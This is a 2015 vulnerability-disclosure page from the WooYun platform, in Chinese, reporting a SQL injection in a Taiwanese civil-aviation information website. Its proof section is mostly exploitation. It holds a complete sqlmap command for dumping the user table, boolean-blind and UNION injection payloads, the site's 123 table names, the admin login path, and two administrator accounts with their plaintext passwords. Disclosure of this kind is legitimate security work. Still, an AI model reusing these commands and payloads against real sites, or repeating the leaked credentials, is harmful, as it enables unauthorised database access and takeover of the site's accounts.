台湾民航资讯网某处存在SQL注射漏洞（123个表/管理明文密码泄露/可登录）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149042

漏洞标题：台湾民航资讯网某处存在SQL注射漏洞（123个表/管理明文密码泄露/可登录）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-10-25 12:32

修复时间：2015-12-11 00:12

公开时间：2015-12-11 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-25：细节已通知厂商并且等待厂商处理中
2015-10-27：厂商已经确认，细节仅向厂商公开
2015-11-06：细节向核心白帽子及相关领域专家公开
2015-11-16：细节向普通白帽子公开
2015-11-26：细节向实习白帽子公开
2015-12-11：细节向公众公开

简要描述：

台湾民航资讯网某处存在SQL注射漏洞（123个表/管理明文密码泄露/可登录）

详细说明：

测试地址：http://**.**.**.**/company_detail.php?id=1

python sqlmap.py -u "http://**.**.**.**/company_detail.php?id=1" --random-agent -p id --technique=BU -D twairinfocom -T _users -C id,account,password,realname --dump

登陆地址：http://**.**.**.**/admin/_login.php

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582
    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user:    'twairinfocom@%'
current user is DBA:    False
database management system users [1]:
[*] 'twairinfocom'@'%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582
    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] twairinfocom
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582
    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: twairinfocom
[123 tables]
+----------------------------+
| _acl_group                 |
| _acl_user                  |
| _config                    |
| _content                   |
| _errorlog                  |
| _groups                    |
| _users                     |
| column                     |
| order                      |
| pad                        |
| ad                         |
| adbanner                   |
| aircompanyindex            |
| airplainplace              |
| airplaintime               |
| airport                    |
| airportindex               |
| album                      |
| album_reply                |
| annals                     |
| blog                       |
| blog_album                 |
| blog_album_category        |
| blog_album_reply           |
| blog_article               |
| blog_article_category      |
| company                    |
| craft                      |
| craft_from                 |
| craft_iata                 |
| craft_note                 |
| craft_price                |
| craft_reply                |
| craft_stock                |
| craft_stock_airplan        |
| craft_user                 |
| cyclopedic                 |
| discuss                    |
| discusstype                |
| dollartype                 |
| download                   |
| enewspaper                 |
| english                    |
| englishtype                |
| exchange                   |
| freight                    |
| holiday                    |
| km                         |
| link                       |
| nation                     |
| news                       |
| p                          |
| phpbb_acl_groups           |
| phpbb_acl_options          |
| phpbb_acl_roles            |
| phpbb_acl_roles_data       |
| phpbb_acl_users            |
| phpbb_attachments          |
| phpbb_banlist              |
| phpbb_bbcodes              |
| phpbb_bookmarks            |
| phpbb_bots                 |
| phpbb_config               |
| phpbb_confirm              |
| phpbb_disallow             |
| phpbb_drafts               |
| phpbb_extension_groups     |
| phpbb_extensions           |
| phpbb_forums               |
| phpbb_forums_access        |
| phpbb_forums_track         |
| phpbb_forums_watch         |
| phpbb_groups               |
| phpbb_icons                |
| phpbb_lang                 |
| phpbb_log                  |
| phpbb_moderator_cache      |
| phpbb_modules              |
| phpbb_poll_options         |
| phpbb_poll_votes           |
| phpbb_posts                |
| phpbb_privmsgs             |
| phpbb_privmsgs_folder      |
| phpbb_privmsgs_rules       |
| phpbb_privmsgs_to          |
| phpbb_profile_fields       |
| phpbb_profile_fields_data  |
| phpbb_profile_fields_lang  |
| phpbb_profile_lang         |
| phpbb_ranks                |
| phpbb_reports              |
| phpbb_reports_reasons      |
| phpbb_search_results       |
| phpbb_search_wordlist      |
| phpbb_search_wordmatch     |
| phpbb_sessions             |
| phpbb_sessions_keys        |
| phpbb_sitelist             |
| phpbb_smilies              |
| phpbb_styles               |
| phpbb_styles_imageset      |
| phpbb_styles_imageset_data |
| phpbb_styles_template      |
| phpbb_styles_template_data |
| phpbb_styles_theme         |
| phpbb_topics               |
| phpbb_topics_posted        |
| phpbb_topics_track         |
| phpbb_topics_watch         |
| phpbb_user_group           |
| phpbb_users                |
| phpbb_warnings             |
| phpbb_words                |
| phpbb_zebra                |
| ptype                      |
| rediscuss                  |
| sail                       |
| sample                     |
| stock_company              |
| vote                       |
| voterecord                 |
| wanted                     |
| zipcode                    |
+----------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582
    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: twairinfocom
Table: _users
[5 columns]
+----------+---------------------+
| Column   | Type                |
+----------+---------------------+
| account  | varchar(30)         |
| group_id | int(10) unsigned    |
| id       | bigint(20) unsigned |
| password | varchar(30)         |
| realname | varchar(30)         |
+----------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2582=2582
    Type: UNION query
    Title: MySQL UNION query (55) - 21 columns
    Payload: id=-1986 UNION ALL SELECT 55,55,55,55,55,55,55,55,55,55,55,55,55,CONCAT(0x71717a7671,0x666b7049624c5544745472464459635478646271667872794d54445069796477706c6d6e79666b42,0x717a706a71),55,55,55,55,55,55,55#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: twairinfocom
Table: _users
[2 entries]
+----+-----------+-------------------+----------+
| id | account   | password          | realname |
+----+-----------+-------------------+----------+
| 1  | admin     | KATY1130MAGIC0911 | 最高管理者    |
| 24 | magic-tpe | ijnb7557          | magic    |
+----+-----------+-------------------+----------+

修复方案：

增加过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-27 00:10

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149042

漏洞标题：台湾民航资讯网某处存在SQL注射漏洞（123个表/管理明文密码泄露/可登录）（臺灣地區）

相关厂商：台湾民航资讯网

漏洞作者：路人甲

提交时间：2015-10-25 12:32

修复时间：2015-12-11 00:12

公开时间：2015-12-11 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149042

漏洞标题：台湾民航资讯网某处存在SQL注射漏洞（123个表/管理明文密码泄露/可登录）（臺灣地區）

相关厂商：台湾民航资讯网

漏洞作者： 路人甲

提交时间：2015-10-25 12:32

修复时间：2015-12-11 00:12

公开时间：2015-12-11 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0149042"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云